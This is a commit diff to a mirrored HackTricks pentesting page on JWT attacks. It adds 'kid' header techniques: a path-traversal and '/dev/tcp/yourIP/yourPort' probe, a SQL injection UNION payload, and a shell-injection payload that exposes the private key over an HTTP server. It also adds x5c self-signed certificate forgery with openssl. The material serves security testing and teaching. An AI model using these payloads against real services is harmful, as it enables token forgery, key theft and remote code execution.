mirror of
https://github.com/carlospolop/hacktricks
synced 2024-11-22 04:33:28 +00:00
GitBook: [master] one page and one asset modified
This commit is contained in:
parent
39c0d21fb7
commit
2d9b1b56eb
2 changed files with 23 additions and 2 deletions
BIN
.gitbook/assets/image (440).png
Normal file
BIN
.gitbook/assets/image (440).png
Normal file
Binary file not shown.
After Width: | Height: | Size: 112 KiB |
|
@ -83,11 +83,11 @@ If you get an HTTP interaction you now know that the server is trying to load ke
|
|||
|
||||
`kid` is an optional header claim which holds a key identifier, particularly useful when you have multiple keys to sign the tokens and you need to look up the right one to verify the signature.
|
||||
|
||||
### "kid" issues - reveal key:
|
||||
### "kid" issues - reveal key
|
||||
|
||||
If the claim "kid" is used in the header, check the web directory for that file or a variation of it. For example if `"kid":"key/12345"` then look for _/key/12345_ and _/key/12345.pem_ on the web root.
|
||||
|
||||
### "kid" issues - path traversal:
|
||||
### "kid" issues - path traversal
|
||||
|
||||
If the claim "kid" is used in the header, check if you can use a different file in the file system. Pick a file you might be able to predict the content of, or maybe try `"kid":"/dev/tcp/yourIP/yourPort"` to test connectivity, or even some **SSRF** payloads...
|
||||
_Use jwt\_tool's -T flag to tamper the JWT and change the value of the kid claim, then choose to keep the original signature_
|
||||
|
@ -98,6 +98,14 @@ python3 jwt_tool.py <JWT> -I -hc kid -hv "../../dev/null" -S hs256 -p ""
|
|||
|
||||
Using files inside the host with known content you can also forge a valid JWT. For example, in linux systems the file `/proc/sys/kernel/randomize_va_space` has the value set to **2**. So, putting that **path** inside the "**kid**" parameter and using "**2**" as the **symetric password** to generate the JWT you should be able to generate a valid new JWT.
|
||||
|
||||
### "kid" issues - SQL Injection
|
||||
|
||||
In a scenario wehre the content of the "kid" is used to retreive the password from the database, you could change the payload inside the "kid" parameter to: `non-existent-index' UNION SELECT 'ATTACKER';-- -` and then sign the JWT with the secret key `ATTACKER`.
|
||||
|
||||
### "kid" issues - OS Injection
|
||||
|
||||
In a scenario where the "kid" parameter contains a path to the file with the key and this path is being used **inside an executed command** you could be able to obtain RCE and expose the private key with a payload like the following: `/root/res/keys/secret7.key; cd /root/res/keys/ && python -m SimpleHTTPServer 1337&`
|
||||
|
||||
## Miscellaneous attacks
|
||||
|
||||
The following are known weaknesses that should be tested for.
|
||||
|
@ -163,6 +171,19 @@ Then you can use for example [**jwt.io**](https://jwt.io/) ****to create the new
|
|||
|
||||
You can also abuse both of these vulns **for SSRFs**.
|
||||
|
||||
### x5c
|
||||
|
||||
This parameter may contain the **certificate in base64**:
|
||||
|
||||
![](../.gitbook/assets/image%20%28440%29.png)
|
||||
|
||||
If the attacker **generates a self-signed certificate** and creates a forged token using the corresponding private key and replace the "x5c" parameter’s value with the newly generatedcertificate and modifies the other parameters, namely n, e and x5t then essentially the forgedtoken would get accepted by the server.
|
||||
|
||||
```bash
|
||||
openssl req -x509 -nodes -days 365 -newkey rsa:2048 -keyout attacker.key -outattacker.crt
|
||||
openssl x509 -in attacker.crt -text
|
||||
```
|
||||
|
||||
## Embedded Public Key \(CVE-2018-0114\)
|
||||
|
||||
If the JWT has embedded a public key like in the following scenario:
|
||||
|
|
Loading…
Reference in a new issue